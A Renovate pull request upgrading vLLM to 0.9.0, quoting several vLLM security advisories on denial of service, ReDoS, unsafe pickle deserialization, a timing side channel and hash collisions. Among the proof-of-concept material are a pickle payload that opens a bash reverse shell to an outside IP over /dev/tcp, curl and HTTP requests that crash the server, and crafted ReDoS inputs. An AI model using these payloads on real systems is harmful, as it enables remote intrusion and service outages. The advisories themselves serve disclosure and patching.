
Conversation


@renovate renovate bot commented Apr 17, 2025

This PR contains the following updates:

Package Change
vllm ==0.8.0 -> ==0.9.0

GitHub Vulnerability Alerts

GHSA-hf3c-wxg2-49q9

Impact

This report is to highlight a vulnerability in XGrammar, a library used by the structured output feature in vLLM. The XGrammar advisory is here: GHSA-389x-67px-mjg3

The xgrammar library is the default backend used by vLLM to support structured output (a.k.a. guided decoding). Xgrammar provides a required, built-in cache for its compiled grammars stored in RAM. xgrammar is available by default through the OpenAI compatible API server with both the V0 and V1 engines.

A malicious user can send a stream of very short decoding requests with unique schemas, resulting in an addition to the cache for each request. This can result in a Denial of Service by consuming all of the system's RAM.

Note that even if vLLM was configured to use a different backend by default, it is still possible to choose xgrammar on a per-request basis using the guided_decoding_backend key of the extra_body field of the request with the V0 engine. This per-request choice is not available when using the V1 engine.
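To illustrate the per-request mechanism described above, here is a minimal sketch (not from the advisory) of a client sending many requests that each carry a unique schema while forcing the xgrammar backend. It assumes a V0 vLLM OpenAI-compatible server on localhost:8000 and the openai Python client; the model name is a placeholder.

import json
import uuid

from openai import OpenAI

client = OpenAI(base_url="http://localhost:8000/v1", api_key="EMPTY")

for _ in range(10):
    # A trivially unique JSON schema per request; each one is compiled and cached.
    schema = {
        "type": "object",
        "properties": {f"f_{uuid.uuid4().hex}": {"type": "string"}},
    }
    client.completions.create(
        model="placeholder-model",  # placeholder: use the served model name
        prompt="hi",
        max_tokens=1,
        extra_body={
            "guided_json": json.dumps(schema),
            # V0 engine only: select xgrammar even if another backend is the default
            "guided_decoding_backend": "xgrammar",
        },
    )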

Patches

Workarounds

There is no way to workaround this issue in existing versions of vLLM other than preventing untrusted access to the OpenAI compatible API server.

References

CVE-2025-30202

Impact

In a multi-node vLLM deployment, vLLM uses ZeroMQ for some multi-node communication purposes. The primary vLLM host opens an XPUB ZeroMQ socket and binds it to ALL interfaces. While the socket is always opened for a multi-node deployment, it is only used when doing tensor parallelism across multiple hosts.

Any client with network access to this host can connect to this XPUB socket unless its port is blocked by a firewall. Once connected, these arbitrary clients will receive all of the same data broadcasted to all of the secondary vLLM hosts. This data is internal vLLM state information that is not useful to an attacker.

By connecting to this socket many times and not reading the data published to it, an attacker can also cause a denial of service by slowing down or potentially blocking the publisher.
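As a rough sketch of what such a client looks like (assumptions: pyzmq is installed, and the host and port values are placeholders an attacker would discover), a plain SUB socket is enough to receive the broadcast frames; opening many such connections without reading from them is the slow-subscriber scenario described above.

import zmq

XPUB_HOST = "10.0.0.1"  # placeholder: the primary vLLM host
XPUB_PORT = 55555       # placeholder: the randomly chosen XPUB port

ctx = zmq.Context()
sub = ctx.socket(zmq.SUB)
sub.setsockopt_string(zmq.SUBSCRIBE, "")       # subscribe to all topics
sub.connect(f"tcp://{XPUB_HOST}:{XPUB_PORT}")

while True:
    frames = sub.recv_multipart()              # internal vLLM broadcast frames
    print(f"received {len(frames)} frame(s)")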

Detailed Analysis

The XPUB socket in question is created here:

https://github.com/vllm-project/vllm/blob/c21b99b91241409c2fdf9f3f8c542e8748b317be/vllm/distributed/device_communicators/shm_broadcast.py#L236-L237

Data is published over this socket via MessageQueue.enqueue() which is called by MessageQueue.broadcast_object():

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/device_communicators/shm_broadcast.py#L452-L453

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/device_communicators/shm_broadcast.py#L475-L478

The MessageQueue.broadcast_object() method is called by the GroupCoordinator.broadcast_object() method in parallel_state.py:

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/parallel_state.py#L364-L366

The broadcast over ZeroMQ is only done if the GroupCoordinator was created with use_message_queue_broadcaster set to True:

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/parallel_state.py#L216-L219

The only case where GroupCoordinator is created with use_message_queue_broadcaster is the coordinator for the tensor parallelism group:

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/parallel_state.py#L931-L936

To determine what data is broadcasted to the tensor parallelism group, we must continue tracing. GroupCoordinator.broadcast_object() is called by GroupCoordinator.broadcast_tensor_dict():

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/parallel_state.py#L489

which is called by broadcast_tensor_dict() in communication_op.py:

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/distributed/communication_op.py#L29-L34

If we look at _get_driver_input_and_broadcast() in the V0 worker_base.py, we'll see how this tensor dict is formed:

https://github.com/vllm-project/vllm/blob/790b79750b596043036b9fcbee885827fdd2ef3d/vllm/worker/worker_base.py#L332-L352

but the data actually sent over ZeroMQ is the metadata_list portion that is split from this tensor_dict. The tensor parts are sent via torch.distributed and only metadata about those tensors is sent via ZeroMQ.

https://github.com/vllm-project/vllm/blob/54a66e5fee4a1ea62f1e4c79a078b20668e408c6/vllm/distributed/parallel_state.py#L61-L83
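A minimal sketch of the split being described (an illustration under assumed names, not vLLM's exact helper): tensors are pulled out for transport over torch.distributed, and only lightweight metadata placeholders remain in the list that goes over ZeroMQ.

import torch

def split_tensor_dict(tensor_dict):
    metadata_list, tensor_list = [], []
    for key, value in tensor_dict.items():
        if isinstance(value, torch.Tensor):
            # Replace the tensor with a placeholder describing its dtype and shape
            metadata_list.append((key, ("tensor", str(value.dtype), tuple(value.shape))))
            tensor_list.append(value)
        else:
            metadata_list.append((key, value))
    return metadata_list, tensor_list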

Patches

Workarounds

Prior to the fix, your options include:

  1. Do not expose the vLLM host to a network where any untrusted connections may reach the host.
  2. Ensure that only the other vLLM hosts are able to connect to the TCP port used for the XPUB socket. Note that the port used is random.

References

CVE-2025-32444

Impacted Deployments

Note that vLLM instances that do NOT make use of the mooncake integration are NOT vulnerable.

Description

vLLM's integration with mooncake is vulnerable to remote code execution due to using pickle-based serialization over unsecured ZeroMQ sockets. The vulnerable sockets were set to listen on all network interfaces, increasing the likelihood that an attacker is able to reach the vulnerable ZeroMQ sockets to carry out an attack.

This is similar to GHSA-x3m8-f7g5-qhm7; the problem is in

https://github.com/vllm-project/vllm/blob/32b14baf8a1f7195ca09484de3008063569b43c5/vllm/distributed/kv_transfer/kv_pipe/mooncake_pipe.py#L179

Here, recv_pyobj() implicitly calls pickle.loads(), which leads to potential RCE.
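In essence, recv_pyobj() amounts to the following (a simplified sketch of pyzmq's behavior, not the mooncake code), which is why any peer that can reach the socket can trigger arbitrary code execution during unpickling:

import pickle
import zmq

def recv_pyobj_equivalent(sock: zmq.Socket):
    # Arbitrary code can run inside pickle.loads() on attacker-controlled bytes
    return pickle.loads(sock.recv())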

CVE-2025-46560

Summary

A critical performance vulnerability has been identified in the input preprocessing logic of the multimodal tokenizer. The code dynamically replaces placeholder tokens (e.g., <|audio_|>, <|image_|>) with repeated tokens based on precomputed lengths. Due to inefficient list concatenation operations, the algorithm exhibits quadratic time complexity (O(n²)), allowing malicious actors to trigger resource exhaustion via specially crafted inputs.

Details

Affected Component: the input_processor_for_phi4mm function.
https://github.com/vllm-project/vllm/blob/8cac35ba435906fb7eb07e44fe1a8c26e8744f4e/vllm/model_executor/models/phi4mm.py#L1182-L1197

The code modifies the input_ids list in-place using input_ids = input_ids[:i] + tokens + input_ids[i+1:]. Each concatenation operation copies the entire list, leading to O(n) operations per replacement. For k placeholders expanding to m tokens, total time becomes O(kmn), approximating O(n²) in worst-case scenarios.
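A simplified sketch of that quadratic pattern (an illustration under assumed names, not the exact vLLM code): every replacement rebuilds the whole list, so k replacements over a list of length n cost on the order of k·n element copies.

def expand_placeholders_quadratic(input_ids, placeholder, expansion):
    i = 0
    while i < len(input_ids):
        if input_ids[i] == placeholder:
            tokens = [placeholder] * expansion
            # Each concatenation copies the entire list: O(n) work per placeholder
            input_ids = input_ids[:i] + tokens + input_ids[i + 1:]
            i += expansion
        else:
            i += 1
    return input_ids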

PoC

Test data demonstrates quadratic time growth:

test_cases = [100, 200, 400, 800, 1600, 3200, 6400]
run_times = [0.002, 0.007, 0.028, 0.136, 0.616, 2.707, 11.854]  # seconds

Doubling input size increases runtime by ~4x (consistent with O(n²)).

Impact

Denial-of-Service (DoS): An attacker could submit inputs with many placeholders (e.g., 10,000 <|audio_1|> tokens), causing CPU/memory exhaustion.
Example: 10,000 placeholders → ~100 million operations.

Remediation Recommendations

Precompute all placeholder positions and expansion lengths upfront.
Replace dynamic list concatenation with a single preallocated array.

# Sketch of the O(n) approach: build the expanded list in a single pass.
# (placeholder_lengths is assumed to map each placeholder token id to its
#  precomputed expansion length.)
new_input_ids = []
for token in input_ids:
    if token in placeholder_lengths:
        new_input_ids.extend([token] * placeholder_lengths[token])
    else:
        new_input_ids.append(token)

CVE-2025-47277

Impacted Environments

This issue ONLY impacts environments using the PyNcclPipe KV cache transfer integration with the V0 engine. No other configurations are affected.

Summary

vLLM supports the use of the PyNcclPipe class to establish a peer-to-peer communication domain for data transmission between distributed nodes. GPU-side KV-Cache transmission is implemented through the PyNcclCommunicator class, while CPU-side control message passing is handled via the send_obj and recv_obj methods.

A remote code execution vulnerability exists in the PyNcclPipe service. Attackers can exploit this by sending malicious serialized data to gain server control privileges.

The intention was that this interface should only be exposed to a private network using the IP address specified by the --kv-ip CLI parameter. The vLLM documentation covers how this must be limited to a secured network: https://docs.vllm.ai/en/latest/deployment/security.html

Unfortunately, the default behavior from PyTorch is that the TCPStore interface will listen on ALL interfaces, regardless of what IP address is provided. The provided IP address was only used as a client-side address. vLLM was fixed to use a workaround to force the TCPStore instance to bind its socket to a specified private interface.

This issue was reported privately to PyTorch and they determined that this behavior was intentional.

Details

The PyNcclPipe implementation contains a critical security flaw where it directly processes client-provided data using pickle.loads, creating an unsafe deserialization vulnerability that can lead to Remote Code Execution.

  1. Deploy a PyNcclPipe service configured to listen on port 18888 when launched:
from vllm.distributed.kv_transfer.kv_pipe.pynccl_pipe import PyNcclPipe
from vllm.config import KVTransferConfig

config = KVTransferConfig(
    kv_ip="0.0.0.0",
    kv_port=18888,
    kv_rank=0,
    kv_parallel_size=1,
    kv_buffer_size=1024,
    kv_buffer_device="cpu"
)

p = PyNcclPipe(config=config, local_rank=0)
p.recv_tensor()  # Receive data
  2. The attacker crafts malicious packets and sends them to the PyNcclPipe service:
from vllm.distributed.utils import StatelessProcessGroup

class Evil:
    def __reduce__(self):
        import os
        cmd='/bin/bash -c "bash -i >& /dev/tcp/172.28.176.1/8888 0>&1"'
        return (os.system,(cmd,))

client = StatelessProcessGroup.create(
    host='172.17.0.1',
    port=18888,
    rank=1,
    world_size=2,
)

client.send_obj(obj=Evil(),dst=0)

The call stack triggering RCE is as follows:

vllm.distributed.kv_transfer.kv_pipe.pynccl_pipe.PyNcclPipe._recv_impl
	-> vllm.distributed.kv_transfer.kv_pipe.pynccl_pipe.PyNcclPipe._recv_metadata
		-> vllm.distributed.utils.StatelessProcessGroup.recv_obj
			-> pickle.loads 

The attacker obtains a shell as a result (screenshot omitted).

Reporters

This issue was reported independently by three different parties:

  • @kikayli (Zhuque Lab, Tencent)
  • @omjeki
  • Russell Bryant (@russellb)

Fix

CVE-2025-48887

Summary

A Regular Expression Denial of Service (ReDoS) vulnerability exists in the file vllm/entrypoints/openai/tool_parsers/pythonic_tool_parser.py of the vLLM project. The root cause is the use of a highly complex and nested regular expression for tool call detection, which can be exploited by an attacker to cause severe performance degradation or make the service unavailable.

Details

The following regular expression is used to match tool/function call patterns:

r"\[([a-zA-Z]+\w*\(([a-zA-Z]+\w*=.*,\s*)*([a-zA-Z]+\w*=.*\s)?\),\s*)*([a-zA-Z]+\w*\(([a-zA-Z]+\w*=.*,\s*)*([a-zA-Z]+\w*=.*\s*)?\)\s*)+\]"

This pattern contains multiple nested quantifiers (*, +), optional groups, and inner repetitions which make it vulnerable to catastrophic backtracking.

Attack Example:
A malicious input such as

[A(A=	)A(A=,		)A(A=,		)A(A=,		)... (repeated dozens of times) ...]

or

"[A(A=" + "\t)A(A=,\t" * repeat

can cause the regular expression engine to consume CPU exponentially with the input length, effectively freezing or crashing the server (DoS).

Proof of Concept:
A Python script demonstrates that matching such a crafted string with the above regex results in exponential time complexity. Even moderate input lengths can bring the system to a halt.

Length: 22, Time: 0.0000 seconds, Match: False
Length: 38, Time: 0.0010 seconds, Match: False
Length: 54, Time: 0.0250 seconds, Match: False
Length: 70, Time: 0.5185 seconds, Match: False
Length: 86, Time: 13.2703 seconds, Match: False
Length: 102, Time: 319.0717 seconds, Match: False
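A hedged reconstruction of the kind of timing script described above (the measurements shown are the reporter's own; exact payloads and lengths may differ):

import re
import time

TOOL_CALL_REGEX = re.compile(
    r"\[([a-zA-Z]+\w*\(([a-zA-Z]+\w*=.*,\s*)*([a-zA-Z]+\w*=.*\s)?\),\s*)*"
    r"([a-zA-Z]+\w*\(([a-zA-Z]+\w*=.*,\s*)*([a-zA-Z]+\w*=.*\s*)?\)\s*)+\]"
)

for repeat in range(1, 7):
    payload = "[A(A=" + "\t)A(A=,\t" * repeat  # crafted, never-matching input
    start = time.perf_counter()
    match = TOOL_CALL_REGEX.match(payload)
    elapsed = time.perf_counter() - start
    print(f"Length: {len(payload)}, Time: {elapsed:.4f} seconds, Match: {match is not None}")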

Impact

  • Denial of Service (DoS): An attacker can trigger a denial of service by sending specially crafted payloads to any API or interface that invokes this regex, causing excessive CPU usage and making the vLLM service unavailable.
  • Resource Exhaustion and Memory Retention: As this regex is invoked during function call parsing, the matching process may hold on to significant CPU and memory resources for extended periods (due to catastrophic backtracking). In the context of vLLM, this also means that the associated KV cache (used for model inference and typically stored in GPU memory) is not released in a timely manner. This can lead to GPU memory exhaustion, degraded throughput, and service instability.
  • Potential for Broader System Instability: Resource exhaustion from stuck or slow requests may cascade into broader system instability or service downtime if not mitigated.

Fix

GHSA-j828-28rj-hfhp

Summary

A recent review identified several regular expressions in the vllm codebase that are susceptible to Regular Expression Denial of Service (ReDoS) attacks. These patterns, if fed with crafted or malicious input, may cause severe performance degradation due to catastrophic backtracking.

1. vllm/lora/utils.py Line 173

https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/vllm/lora/utils.py#L173
Risk Description:

  • The regex r"\((.*?)\)\$?$" matches content inside parentheses. If input such as ((((a|)+)+)+) is passed in, it can cause catastrophic backtracking, leading to a ReDoS vulnerability.
  • Using .*? (non-greedy match) inside group parentheses can be highly sensitive to input length and nesting complexity.

Remediation Suggestions:

  • Limit the input string length.
  • Use a non-recursive matching approach, or write a regex with stricter content constraints.
  • Consider using possessive quantifiers or atomic groups (supported in Python's re module since 3.11; available via the third-party regex module on older versions), or split and pre-process the input before regex matching.

2. vllm/entrypoints/openai/tool_parsers/phi4mini_tool_parser.py Line 52

https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/vllm/entrypoints/openai/tool_parsers/phi4mini_tool_parser.py#L52

Risk Description:

  • The regex r'functools\[(.*?)\]' uses .*? to match content inside brackets, together with re.DOTALL. If the input contains a large number of nested or crafted brackets, it can cause backtracking and ReDoS.

Remediation Suggestions:

  • Limit the length of model_output.
  • Use a stricter, non-greedy pattern (avoid matching across extraneous nesting).
  • Prefer re.finditer() and enforce a length constraint on each match.
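A sketch of these suggestions under stated assumptions (the length caps and helper name are illustrative, not part of vLLM): bound the input, bound each match, and avoid an unbounded .*? under re.DOTALL.

import re

MAX_OUTPUT_LEN = 16_384     # assumed cap on model_output length
MAX_CALL_BODY_LEN = 2_048   # assumed cap on each functools[...] body

FUNCTOOLS_RE = re.compile(r"functools\[([^\[\]]{1,%d})\]" % MAX_CALL_BODY_LEN)

def extract_tool_call_bodies(model_output: str):
    model_output = model_output[:MAX_OUTPUT_LEN]
    return [m.group(1) for m in FUNCTOOLS_RE.finditer(model_output)]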

3. vllm/entrypoints/openai/serving_chat.py Line 351

https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/vllm/entrypoints/openai/serving_chat.py#L351

Risk Description:

  • The regex r'.*"parameters":\s*(.*)' can trigger backtracking if current_text is very long and contains repeated structures.
  • Especially when processing strings from unknown sources, .* matching any content is high risk.

Remediation Suggestions:

  • Use a more specific pattern (e.g., via JSON parsing).
  • Impose limits on current_text length.
  • Avoid using .* to capture large blocks of text; prefer structured parsing when possible.
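One possible shape of the structured-parsing suggestion (a sketch with assumed limits, not the project's fix): locate the key with a plain string search, then let the json module parse exactly one value.

import json

def extract_parameters(current_text: str, max_len: int = 65_536):
    current_text = current_text[:max_len]   # bound the work up front
    key = '"parameters"'
    idx = current_text.find(key)
    if idx == -1:
        return None
    try:
        colon = current_text.index(":", idx + len(key))
        # raw_decode parses a single JSON value and ignores any trailing text
        value, _ = json.JSONDecoder().raw_decode(current_text[colon + 1:].lstrip())
        return value
    except ValueError:  # also covers json.JSONDecodeError
        return None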

4. benchmarks/benchmark_serving_structured_output.py Line 650

https://github.com/vllm-project/vllm/blob/2858830c39da0ae153bc1328dbba7680f5fbebe1/benchmarks/benchmark_serving_structured_output.py#L650

Risk Description:

  • The regex r'\{.*\}' is used to extract JSON inside curly braces. If the actual string is very long with unbalanced braces, it can cause backtracking, leading to a ReDoS vulnerability.
  • Although this is used for benchmark correctness checking, it should still handle abnormal inputs carefully.

Remediation Suggestions:

  • Limit the length of actual.
  • Prefer stepwise search for { and } or use a robust JSON extraction tool.
  • Recommend first locating the range with simple string search, then applying regex.
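A sketch of the last suggestion (assumed length cap; not the benchmark's actual code): locate the outermost braces with plain string search and hand the slice to the json module instead of applying r'\{.*\}'.

import json

def extract_json_block(actual: str, max_len: int = 65_536):
    actual = actual[:max_len]
    start, end = actual.find("{"), actual.rfind("}")
    if start == -1 or end <= start:
        return None
    try:
        return json.loads(actual[start:end + 1])
    except json.JSONDecodeError:
        return None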

Fix


CVE-2025-46570

This issue arises from the prefix caching mechanism, which may expose the system to a timing side-channel attack.

Description

When a new prompt is processed, if the PageAttention mechanism finds a matching prefix chunk, the prefill process speeds up, which is reflected in the TTFT (Time to First Token). Our tests revealed that the timing differences caused by matching chunks are significant enough to be recognized and exploited.

For instance, if the victim has submitted a sensitive prompt or if a valuable system prompt has been cached, an attacker sharing the same backend could attempt to guess the victim's input. By measuring the TTFT based on prefix matches, the attacker could verify if their guess is correct, leading to potential leakage of private information.

Unlike token-by-token sharing mechanisms, vLLM’s chunk-based approach (PageAttention) processes tokens in larger units (chunks). In our tests, with chunk_size=2, the timing differences became noticeable enough to allow attackers to infer whether portions of their input match the victim's prompt at the chunk level.
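A minimal sketch of the measurement this attack relies on (assumptions: a streaming OpenAI-compatible endpoint on localhost:8000 and a placeholder model name): the time from sending a guessed prefix to receiving the first streamed chunk approximates the TTFT.

import time

import requests

def measure_ttft(prompt: str, url: str = "http://localhost:8000/v1/completions"):
    payload = {
        "model": "placeholder-model",  # placeholder: use the served model name
        "prompt": prompt,
        "max_tokens": 1,
        "temperature": 0.0,
        "stream": True,
    }
    start = time.perf_counter()
    with requests.post(url, json=payload, stream=True) as resp:
        for line in resp.iter_lines():
            if line:  # first non-empty SSE chunk ≈ first token
                return time.perf_counter() - start
    return None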

Environment

  • GPU: NVIDIA A100 (40G)
  • CUDA: 11.8
  • PyTorch: 2.3.1
  • OS: Ubuntu 18.04
  • vLLM: v0.5.1
  • Configuration: We launched vLLM using the default settings and adjusted chunk_size=2 to evaluate the TTFT.

Leakage

We conducted our tests using LLaMA2-70B-GPTQ on a single device. We analyzed the timing differences when prompts shared prefixes of 2 chunks, and plotted the corresponding ROC curves. Our results suggest that timing differences can be reliably used to distinguish prefix matches, demonstrating a potential side-channel vulnerability.
(Figure: combined ROC curves for 2-chunk prefix matching.)

Results

In our experiment, we analyzed the response time differences between cache hits and misses in vLLM's PageAttention mechanism. Using ROC curve analysis to assess the distinguishability of these timing differences, we observed the following results:

  • With a 1-token prefix, the ROC curve yielded an AUC value of 0.571, indicating that even with a short prefix, an attacker can reasonably distinguish between cache hits and misses based on response times.
  • When the prefix length increases to 8 tokens, the AUC value rises significantly to 0.99, showing that the attacker can almost perfectly identify cache hits with a longer prefix.

Fixes

CVE-2025-46722

Summary

In the file vllm/multimodal/hasher.py, the MultiModalHasher class has a security and data integrity issue in its image hashing method. Currently, it serializes PIL.Image.Image objects using only obj.tobytes(), which returns only the raw pixel data, without including metadata such as the image’s shape (width, height, mode). As a result, two images of different sizes (e.g., 30x100 and 100x30) with the same pixel byte sequence could generate the same hash value. This may lead to hash collisions, incorrect cache hits, and even data leakage or security risks.

Details

  • Affected file: vllm/multimodal/hasher.py
  • Affected method: MultiModalHasher.serialize_item
    https://github.com/vllm-project/vllm/blob/9420a1fc30af1a632bbc2c66eb8668f3af41f026/vllm/multimodal/hasher.py#L34-L35
  • Current behavior: For Image.Image instances, only obj.tobytes() is used for hashing.
  • Problem description: obj.tobytes() does not include the image’s width, height, or mode metadata.
  • Impact: Two images with the same pixel byte sequence but different sizes could be regarded as the same image by the cache and hashing system, which may result in:
    • Incorrect cache hits, leading to abnormal responses
    • Deliberate construction of images with different meanings but the same hash value

Recommendation

In the serialize_item method, serialization of Image.Image objects should include not only pixel data, but also all critical metadata—such as dimensions (size), color mode (mode), format, and especially the info dictionary. The info dictionary is particularly important in palette-based images (e.g., mode 'P'), where the palette itself is stored in info. Ignoring info can result in hash collisions between visually distinct images with the same pixel bytes but different palettes or metadata. This can lead to incorrect cache hits or even data leakage.

Summary:
Serializing only the raw pixel data is insecure. Always include all image metadata (size, mode, format, info) in the hash calculation to prevent collisions, especially in cases like palette-based images.
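A minimal sketch of that recommendation (an illustrative helper, not vLLM's hasher): fold the image's size, mode, format, and info dictionary into the hashed bytes alongside the raw pixels so that differently shaped or differently annotated images cannot collide.

import hashlib

from PIL import Image

def hash_image(img: Image.Image) -> str:
    h = hashlib.sha256()
    # Metadata first: size, mode, format, and the info dict
    h.update(repr((img.size, img.mode, img.format, sorted(img.info.items()))).encode())
    h.update(img.tobytes())  # then the raw pixel data
    return h.hexdigest()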

Impact for other modalities
The video modality is transformed into a multi-dimensional numpy array encoding the video's height, width, number of frames, and so on, so the same problem exists there: the numpy array's shape is likewise not included in the serialization.

For audio, librosa.load converts the input to mono by default, so the loaded audio is returned as a one-dimensional numpy array; its structure is therefore fixed and not affected by this issue.

Fixes

CVE-2025-48942

Summary

Hitting the /v1/completions API with an invalid json_schema as a guided parameter will kill the vLLM server.

Details

The following API call
(venv) [derekh@ip-172-31-15-108 ]$ curl -s http://localhost:8000/v1/completions -H "Content-Type: application/json" -d '{"model": "meta-llama/Llama-3.2-3B-Instruct","prompt": "Name two great reasons to visit Sligo ", "max_tokens": 10, "temperature": 0.5, "guided_json":"{\"properties\":{\"reason\":{\"type\": \"stsring\"}}}"}'
will provoke an uncaught exception from xgrammar in
./lib64/python3.11/site-packages/xgrammar/compiler.py

Issue with more information: https://github.com/vllm-project/vllm/issues/17248

PoC

Make a call to vLLM with an invalid json_schema, e.g. {\"properties\":{\"reason\":{\"type\": \"stsring\"}}}

curl -s http://localhost:8000/v1/completions -H "Content-Type: application/json" -d '{"model": "meta-llama/Llama-3.2-3B-Instruct","prompt": "Name two great reasons to visit Sligo ", "max_tokens": 10, "temperature": 0.5, "guided_json":"{\"properties\":{\"reason\":{\"type\": \"stsring\"}}}"}'

Impact

vLLM crashes

example traceback

ERROR 03-26 17:25:01 [core.py:340] EngineCore hit an exception: Traceback (most recent call last):
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 333, in run_engine_core
ERROR 03-26 17:25:01 [core.py:340]     engine_core.run_busy_loop()
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 367, in run_busy_loop
ERROR 03-26 17:25:01 [core.py:340]     outputs = step_fn()
ERROR 03-26 17:25:01 [core.py:340]               ^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/engine/core.py", line 181, in step
ERROR 03-26 17:25:01 [core.py:340]     scheduler_output = self.scheduler.schedule()
ERROR 03-26 17:25:01 [core.py:340]                        ^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/core/scheduler.py", line 257, in schedule
ERROR 03-26 17:25:01 [core.py:340]     if structured_output_req and structured_output_req.grammar:
ERROR 03-26 17:25:01 [core.py:340]                                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/structured_output/request.py", line 41, in grammar
ERROR 03-26 17:25:01 [core.py:340]     completed = self._check_grammar_completion()
ERROR 03-26 17:25:01 [core.py:340]                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/structured_output/request.py", line 29, in _check_grammar_completion
ERROR 03-26 17:25:01 [core.py:340]     self._grammar = self._grammar.result(timeout=0.0001)
ERROR 03-26 17:25:01 [core.py:340]                     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/usr/lib64/python3.11/concurrent/futures/_base.py", line 456, in result
ERROR 03-26 17:25:01 [core.py:340]     return self.__get_result()
ERROR 03-26 17:25:01 [core.py:340]            ^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/usr/lib64/python3.11/concurrent/futures/_base.py", line 401, in __get_result
ERROR 03-26 17:25:01 [core.py:340]     raise self._exception
ERROR 03-26 17:25:01 [core.py:340]   File "/usr/lib64/python3.11/concurrent/futures/thread.py", line 58, in run
ERROR 03-26 17:25:01 [core.py:340]     result = self.fn(*self.args, **self.kwargs)
ERROR 03-26 17:25:01 [core.py:340]              ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/vllm/v1/structured_output/__init__.py", line 120, in _async_create_grammar
ERROR 03-26 17:25:01 [core.py:340]     ctx = self.compiler.compile_json_schema(grammar_spec,
ERROR 03-26 17:25:01 [core.py:340]           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
ERROR 03-26 17:25:01 [core.py:340]   File "/home/derekh/workarea/vllm/venv/lib64/python3.11/site-packages/xgrammar/compiler.py", line 101, in compile_json_schema
ERROR 03-26 17:25:01 [core.py:340]     self._handle.compile_json_schema(
ERROR 03-26 17:25:01 [core.py:340] RuntimeError: [17:25:01] /project/cpp/json_schema_converter.cc:795: Check failed: (schema.is<picojson::object>()) is false: Schema should be an object or bool
ERROR 03-26 17:25:01 [core.py:340] 
ERROR 03-26 17:25:01 [core.py:340] 
CRITICAL 03-26 17:25:01 [core_client.py:269] Got fatal signal from worker processes, shutting down. See stack trace above for root cause issue.

Fix

CVE-2025-48943

Impact

A denial of service bug caused the vLLM server to crash if an invalid regex was provided while using structured output. This vulnerability is similar to GHSA-6qc9-v4r8-22xg, but for regex instead of a JSON schema.

Issue with more details: https://github.com/vllm-project/vllm/issues/17313

Patches

CVE-2025-48944

Summary

The vLLM backend used with the /v1/chat/completions OpenAI-compatible endpoint fails to validate unexpected or malformed input in the "pattern" and "type" fields when the tools functionality is invoked. These inputs are not validated before being compiled or parsed, causing a crash of the inference worker with a single request. The worker will remain down until it is restarted.

Details

The "type" field is expected to be one of: "string", "number", "object", "boolean", "array", or "null". Supplying any other value will cause the worker to crash with the following error:

RuntimeError: [11:03:34] /project/cpp/json_schema_converter.cc:637: Unsupported type "something_or_nothing"

The "pattern" field undergoes Jinja2 rendering (I think) prior to being passed unsafely into the native regex compiler without validation or escaping. This allows malformed expressions to reach the underlying C++ regex engine, resulting in fatal errors.

For example, the following inputs will crash the worker:

  • Unclosed {, [, or (
  • Closed: {} and []

Here are some of the runtime errors on crash, depending on what gets injected:

RuntimeError: [12:05:04] /project/cpp/regex_converter.cc:73: Regex parsing error at position 4: The parenthesis is not closed.
RuntimeError: [10:52:27] /project/cpp/regex_converter.cc:73: Regex parsing error at position 2: Invalid repetition count.
RuntimeError: [12:07:18] /project/cpp/regex_converter.cc:73: Regex parsing error at position 6: Two consecutive repetition modifiers are not allowed.

PoC

Here is the POST request using the type field to crash the worker. Note the type field is set to "something" rather than the expected types it is looking for:
POST /v1/chat/completions HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
Content-Type: application/json
Content-Length: 579
Origin:
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connection: keep-alive

{
  "model": "mistral-nemo-instruct",
  "messages": [{ "role": "user", "content": "crash via type" }],
  "tools": [
    {
      "type": "function",
      "function": {
        "name": "crash01",
        "parameters": {
          "type": "object",
          "properties": {
            "a": {
              "type": "something"
            }
          }
        }
      }
    }
  ],
  "tool_choice": {
    "type": "function",
    "function": {
      "name": "crash01",
      "arguments": { "a": "test" }
    }
  },
  "stream": false,
  "max_tokens": 1
}

Here is the POST request using the pattern field to crash the worker. Note the pattern field is set to an RCE payload; it could have just been set to {{}}. I was not able to get RCE in my testing, but it does crash the worker.

POST /v1/chat/completions HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: application/json
